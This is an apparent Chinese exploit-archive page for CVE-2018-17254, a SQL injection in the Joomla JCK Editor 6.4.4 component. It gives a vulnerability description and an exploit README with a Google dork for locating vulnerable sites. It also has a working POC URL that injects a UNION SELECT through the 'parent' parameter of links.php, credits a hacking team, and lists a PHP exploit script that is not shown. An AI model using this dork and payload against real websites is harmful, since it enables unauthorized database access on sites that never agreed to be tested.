关联漏洞
标题:Joomla! JCK Editor组件SQL注入漏洞 (CVE-2018-17254)Description:Joomla!是美国Open Source Matters团队开发的一套开源的内容管理系统(CMS),该系统提供RSS馈送、网站搜索等功能。JCK Editor是其中的一个编辑器组件。 Joomla! JCK Editor组件6.4.4版本中存在SQL注入漏洞。远程攻击者可通过向jtreelink/dialogs/links.php页面发送‘parent’参数利用该漏洞执行SQL命令。
Description
Joomla JCK Editor 6.4.4 - 'parent' SQL Injection
介绍
# CVE-2018-17254

<pre>
# Exploit Title: Joomla JCK Editor 6.4.4 - 'parent' SQL Injection>
# Googke Dork: inurl:/plugins/editors/jckeditor/plugins/jtreelink/
# Vendor Homepage: http://docs.arkextensions.com/downloads/jck-editor
# Version: 6.4.4
# Tested on: Debian 10 Ubuntu Windows 11/10
# CVE : CVE-2018-17254
# PHP version (exploit): 7.3.27
# POC: /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent="%20UNION%20SELECT%20NULL,NULL,@@version,NULL,NULL,NULL,NULL,NULL--%20aa
Preference : https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-17254</pre>
Greettzz LXPLOIT - CUKIMAY CYBER TEAM
My Friends : Noniod7 - Ardzz
Recoded from : Hamza Megahed
https://www.bloglumajangteamsec.my.id/2023/01/cve-2018-17254-eksploitasi.html
文件快照
[4.0K] /data/pocs/e13bd93d822af7d188178cc7ec8f902f96bebe0d
├── [ 12K] CVE-2018-17254.php
└── [ 846] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。